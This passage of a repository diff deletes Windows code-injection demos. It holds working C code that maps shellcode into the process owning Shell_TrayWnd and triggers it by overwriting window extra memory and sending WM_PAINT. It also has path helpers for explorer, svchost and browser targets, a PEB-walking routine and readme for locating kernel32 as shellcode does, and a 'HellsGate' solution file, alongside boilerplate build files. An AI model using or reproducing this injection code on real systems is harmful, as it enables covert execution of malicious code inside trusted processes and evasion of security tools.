if (cmdLine[offset] != '\"' && cmdLine[offset] != '\'') {
return false;
}
if (cmdLine[0] == '\"' || cmdLine[0] == '\'') {
wcsncpy(dirBuf, cmdLine+1, offset-1);
dirBuf[offset-1] = NULL;
} else {
wcsncpy(dirBuf, cmdLine, offset);
dirBuf[offset + 1] = NULL;
}
printf("Dir: %S\n", dirBuf);
return true;
}
bool get_default_browser(LPWSTR lpwOutPath, DWORD szOutPath)
{
HKEY phkResult;
DWORD iMaxLen = szOutPath;
LSTATUS res = RegOpenKeyEx(HKEY_CLASSES_ROOT, L"HTTP\\shell\\open\\command", 0, 1u, &phkResult);
if (res != ERROR_SUCCESS) {
printf("[ERROR] Failed with value = %x\n", res);
return false;
}
res = RegQueryValueEx(phkResult, NULL, NULL, NULL, (LPBYTE) lpwOutPath, (LPDWORD) &iMaxLen);
if (res != ERROR_SUCCESS) {
printf("[ERROR] Failed with value = %x\n", res);
return false;
}
replace_param(lpwOutPath, szOutPath, L"www.google.com");
return true;
}
bool get_calc_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
#if defined(_WIN64)
ExpandEnvironmentStrings(L"%SystemRoot%\\SysWoW64\\calc.exe", lpwOutPath, szOutPath);
#else
ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\calc.exe", lpwOutPath, szOutPath);
#endif
printf("%S\n", lpwOutPath);
return true;
}
bool get_svchost_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
#if defined(_WIN64)
ExpandEnvironmentStrings(L"%SystemRoot%\\SysWoW64\\svchost.exe", lpwOutPath, szOutPath);
#else
ExpandEnvironmentStrings(L"%SystemRoot%\\system32\\svchost.exe", lpwOutPath, szOutPath);
#endif
printf("%S\n", lpwOutPath);
return true;
}
bool get_explorer_path(LPWSTR lpwOutPath, DWORD szOutPath)
{
ExpandEnvironmentStrings(L"%windir%\\explorer.exe", lpwOutPath, szOutPath);
printf("%S\n", lpwOutPath );
return true;
}


@ -1,14 +0,0 @@
#pragma once
void hex_dump(unsigned char *buf, size_t buf_size)
{
size_t pad = 8;
size_t col = 16;
putchar('\n');
for (size_t i = 0; i < buf_size; i++) {
if (i != 0 && i % pad == 0) putchar('\t');
if (i != 0 && i % col == 0) putchar('\n');
printf("%02X ", buf[i]);
}
putchar('\n');
}


@ -1,115 +0,0 @@
#include "window_long_inject.h"
#include <stdio.h>
//for injection into Shell_TrayWnd
PVOID map_code_and_addresses_into_process(HANDLE hProcess, LPBYTE shellcode, SIZE_T shellcodeSize)
{
HANDLE hSection = NULL;
OBJECT_ATTRIBUTES hAttributes;
memset(&hAttributes, 0, sizeof(OBJECT_ATTRIBUTES));
LARGE_INTEGER maxSize;
maxSize.HighPart = 0;
maxSize.LowPart = sizeof(LONG) * 2 + shellcodeSize; //we need space for the shellcode and two pointers
NTSTATUS status = NULL;
if ((status = ZwCreateSection( &hSection, SECTION_ALL_ACCESS, NULL, &maxSize, PAGE_EXECUTE_READWRITE, SEC_COMMIT, NULL)) != STATUS_SUCCESS)
{
printf("[ERROR] ZwCreateSection failed, status : %x\n", status);
return NULL;
}
PVOID sectionBaseAddress = NULL;
ULONG viewSize = 0;
SECTION_INHERIT inheritDisposition = ViewShare; //VIEW_SHARE
// map the section in context of current process:
if ((status = NtMapViewOfSection(hSection, GetCurrentProcess(), &sectionBaseAddress, NULL, NULL, NULL, &viewSize, inheritDisposition, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
printf("Section BaseAddress: %p\n", sectionBaseAddress);
//map the new section into context of opened process
PVOID sectionBaseAddress2 = NULL;
if ((status = NtMapViewOfSection(hSection, hProcess, &sectionBaseAddress2, NULL, NULL, NULL, &viewSize, ViewShare, NULL, PAGE_EXECUTE_READWRITE)) != STATUS_SUCCESS)
{
printf("[ERROR] NtMapViewOfSection failed, status : %x\n", status);
return NULL;
}
LPVOID shellcode_remote_ptr = sectionBaseAddress2;
LPVOID shellcode_local_ptr = sectionBaseAddress;
//the same page have double mapping - remote and local, so local modifications are reflected remotely
memcpy (shellcode_local_ptr, shellcode, shellcodeSize);
printf("Shellcode copied!\n");
LPVOID handles_remote_ptr = (BYTE*) shellcode_remote_ptr + shellcodeSize;
LPVOID handles_local_ptr = (BYTE*) shellcode_local_ptr + shellcodeSize;
//store the remote addresses
PVOID buf_va = (BYTE*) handles_remote_ptr;
LONG hop1 = (LONG) buf_va + sizeof(LONG);
LONG shellc_va = (LONG) shellcode_remote_ptr;
//fill the pointers
memcpy((BYTE*)handles_local_ptr, &hop1, sizeof(LONG));
memcpy((BYTE*)handles_local_ptr + sizeof(LONG), &shellc_va, sizeof(LONG));
//unmap from the context of current process
ZwUnmapViewOfSection(GetCurrentProcess(), sectionBaseAddress);
ZwClose(hSection);
printf("Section mapped at address: %p\n", sectionBaseAddress2);
return shellcode_remote_ptr;
}
bool inject_into_tray(LPBYTE shellcode, SIZE_T shellcodeSize)
{
HWND hWnd = FindWindow(L"Shell_TrayWnd", NULL);
if (hWnd == NULL) return false;
DWORD pid = 0;
GetWindowThreadProcessId(hWnd, &pid);
printf("PID:\t%d\n", pid);
//save the current value, because we will need to recover it:
LONG winLong = GetWindowLongW(hWnd, 0);
printf("WindowLong:\t%lx\n", winLong);
HANDLE hProcess = OpenProcess(PROCESS_VM_OPERATION | PROCESS_VM_WRITE, false, pid);
if (hProcess == NULL) {
return false;
}
LPVOID remote_shellcode_ptr = map_code_and_addresses_into_process(hProcess, shellcode, shellcodeSize);
if (remote_shellcode_ptr == NULL) {
return false;
}
LPVOID remote_handles_ptr = (BYTE*) remote_shellcode_ptr + shellcodeSize;
printf("Saving handles to:\t%p\n", remote_handles_ptr);
//set the handle to the injected:
SetWindowLong(hWnd, 0, (LONG) remote_handles_ptr);
//send signal to execute the injected code
SendNotifyMessage(hWnd, WM_PAINT, 0, 0);
//procedure will be triggered on every message
//in order to avoid repetitions, injected code should restore the previous value after the first exection
//here we are checking if it is done
size_t max_wait = 5;
while (GetWindowLong(hWnd, 0) != winLong) {
//not restored, wait more
Sleep(100);
if ((max_wait--) == 0) {
//don't wait longer, restore by yourself
SetWindowLong(hWnd, 0, winLong);
SendNotifyMessage(hWnd, WM_PAINT, 0, 0);
}
}
CloseHandle(hProcess);
return true;
}


@ -1,6 +0,0 @@
#pragma once
#include <Windows.h>
#include "ntddk.h"
bool inject_into_tray(LPBYTE shellcode, SIZE_T shellcodeSize);


@ -1,26 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 11.00
# Visual Studio 2010
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "GetKernel32Addressx64", "GetKernel32Addressx64\GetKernel32Addressx64.vcxproj", "{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|Win32.ActiveCfg = Debug|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|Win32.Build.0 = Debug|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|x64.ActiveCfg = Debug|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Debug|x64.Build.0 = Debug|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|Win32.ActiveCfg = Release|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|Win32.Build.0 = Release|Win32
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|x64.ActiveCfg = Release|x64
{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -1,59 +0,0 @@
// GetKernel32Addressx64.cpp : 定义控制台应用程序的入口点。
//
#include "stdafx.h"
#include "GetKernel32Addressx64.h"
#ifdef _DEBUG
#define new DEBUG_NEW
#endif
// 唯一的应用程序对象
CWinApp theApp;
using namespace std;
#include<windows.h>
extern "C" PVOID64 _cdecl GetPeb();
typedef struct _UNICODE_STRING {
USHORT Length;
USHORT MaximumLength;
PWSTR Buffer;
}UNICODE_STRING, *PUNICODE_STRING;
int _tmain(int argc, TCHAR* argv[], TCHAR* envp[])
{
PVOID64 Peb = NULL;
PVOID64 LDR_DATA_Addr = NULL;
UNICODE_STRING* FullName;
HMODULE hKernel32 = NULL;
LIST_ENTRY* pNode = NULL;
// For win7 x64 TEST
Peb = GetPeb();
if(Peb == NULL)
return 0;
LDR_DATA_Addr = *(PVOID64**)((BYTE*)Peb+0x018);
if(LDR_DATA_Addr == NULL)
return 0;
pNode =(LIST_ENTRY*)(*(PVOID64**)((BYTE*)LDR_DATA_Addr+0x30));
while(true)
{
FullName = (UNICODE_STRING*)((BYTE*)pNode+0x38);
if(*(FullName->Buffer + 12) == '\0')
{
hKernel32 = (HMODULE)(*((ULONG64*)((BYTE*)pNode+0x10)));
break;
}
pNode = pNode->Flink;
}
printf("%S : %p",FullName->Buffer,hKernel32);
return 0;
}


@ -1,3 +0,0 @@
#pragma once
#include "resource.h"


@ -1,176 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{1215E56F-670D-4DBF-9750-D7EB3D74F4B9}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>GetKernel32Addressx64</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
<UseOfMfc>Dynamic</UseOfMfc>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.props" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>MaxSpeed</Optimization>
<FunctionLevelLinking>true</FunctionLevelLinking>
<IntrinsicFunctions>true</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
</ItemDefinitionGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="GetKernel32Addressx64.h" />
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="GetKernel32Addressx64.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="GetKernel32Addressx64.rc" />
</ItemGroup>
<ItemGroup>
<Reference Include="System" />
<Reference Include="System.Data" />
<Reference Include="System.Drawing" />
<Reference Include="System.Windows.Forms" />
<Reference Include="System.Xml" />
</ItemGroup>
<ItemGroup>
<MASM Include="GetPeb.asm">
<IncludePaths Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">C:\Users\TyLtw\Documents\Visual Studio 2010\Projects\GetKernel32Addressx64;%(IncludePaths)</IncludePaths>
</MASM>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>


@ -1,52 +0,0 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="源文件">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="头文件">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="资源文件">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<None Include="ReadMe.txt" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>头文件</Filter>
</ClInclude>
<ClInclude Include="GetKernel32Addressx64.h">
<Filter>头文件</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>源文件</Filter>
</ClCompile>
<ClCompile Include="GetKernel32Addressx64.cpp">
<Filter>源文件</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="GetKernel32Addressx64.rc">
<Filter>资源文件</Filter>
</ResourceCompile>
</ItemGroup>
<ItemGroup>
<MASM Include="GetPeb.asm">
<Filter>源文件</Filter>
</MASM>
</ItemGroup>
</Project>


@ -1,7 +0,0 @@
.CODE
GetPeb PROC
mov rax,gs:[60h]
ret
GetPeb ENDP
END


@ -1,17 +0,0 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by GetKernel32Addressx64.rc
//
#define IDS_APP_TITLE 103
// 新对象的下一组默认值
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NEXT_RESOURCE_VALUE 101
#define _APS_NEXT_COMMAND_VALUE 40001
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 101
#endif
#endif


@ -1,8 +0,0 @@
// stdafx.cpp : 只包括标准包含文件的源文件
// GetKernel32Addressx64.pch 将作为预编译头
// stdafx.obj 将包含预编译类型信息
#include "stdafx.h"
// TODO: 在 STDAFX.H 中
// 引用任何所需的附加头文件,而不是在此文件中引用


@ -1,32 +0,0 @@
// stdafx.h : 标准系统包含文件的包含文件,
// 或是经常使用但不常更改的
// 特定于项目的包含文件
//
#pragma once
#include "targetver.h"
#include <stdio.h>
#include <tchar.h>
#define _ATL_CSTRING_EXPLICIT_CONSTRUCTORS // 某些 CString 构造函数将是显式的
#ifndef VC_EXTRALEAN
#define VC_EXTRALEAN // 从 Windows 头文件中排除极少使用的信息
#endif
#include <afx.h>
#include <afxwin.h> // MFC 核心组件和标准组件
#include <afxext.h> // MFC 扩展
#ifndef _AFX_NO_OLE_SUPPORT
#include <afxdtctl.h> // MFC 对 Internet Explorer 4 公共控件的支持
#endif
#ifndef _AFX_NO_AFXCMN_SUPPORT
#include <afxcmn.h> // MFC 对 Windows 公共控件的支持
#endif // _AFX_NO_AFXCMN_SUPPORT
#include <iostream>
// TODO: 在此处引用程序需要的其他头文件


@ -1,8 +0,0 @@
#pragma once
// 包括 SDKDDKVer.h 将定义可用的最高版本的 Windows 平台。
// 如果要为以前的 Windows 平台生成应用程序,请包括 WinSDKVer.h并将
// WIN32_WINNT 宏设置为要支持的平台,然后再包括 SDKDDKVer.h。
#include <SDKDDKVer.h>


@ -1,14 +0,0 @@
in x64
1.get peb from fs:[0x60] by asm file
2.get Ldr by peb
3.get kernel32 module in the third module
ntdll->kernelbase->kernel32
in x86
1.get peb from fs:[0x30] by inline asm
2.get Ldr by peb
3.get kernel32 module in the second module
ntdll->kernel32
the offset in the PEB is different from x64 and x86
This demo is only Test on Win7 x64


@ -1,360 +0,0 @@
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Ww][Ii][Nn]32/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
[Ll]ogs/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# ASP.NET Scaffolding
ScaffoldingReadMe.txt
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.meta
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.log
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Coverlet is a free, cross platform Code Coverage Tool
coverage*[.json, .xml, .info]
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
__pycache__/
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# Ionide (cross platform F# VS Code tools) working folder
.ionide/
# Fody - auto-generated XML schema
FodyWeavers.xsd


@ -1,31 +0,0 @@

Microsoft Visual Studio Solution File, Format Version 12.00
# Visual Studio Version 16
VisualStudioVersion = 16.0.30114.105
MinimumVisualStudioVersion = 10.0.40219.1
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "HellsGate", "HellsGate\HellsGate.vcxproj", "{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|x64 = Debug|x64
Debug|x86 = Debug|x86
Release|x64 = Release|x64
Release|x86 = Release|x86
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.ActiveCfg = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x64.Build.0 = Debug|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.ActiveCfg = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Debug|x86.Build.0 = Debug|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.ActiveCfg = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x64.Build.0 = Release|x64
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.ActiveCfg = Release|Win32
{DC6187CB-D5DF-4973-84A2-F92AAE90CDA9}.Release|x86.Build.0 = Release|Win32
EndGlobalSection
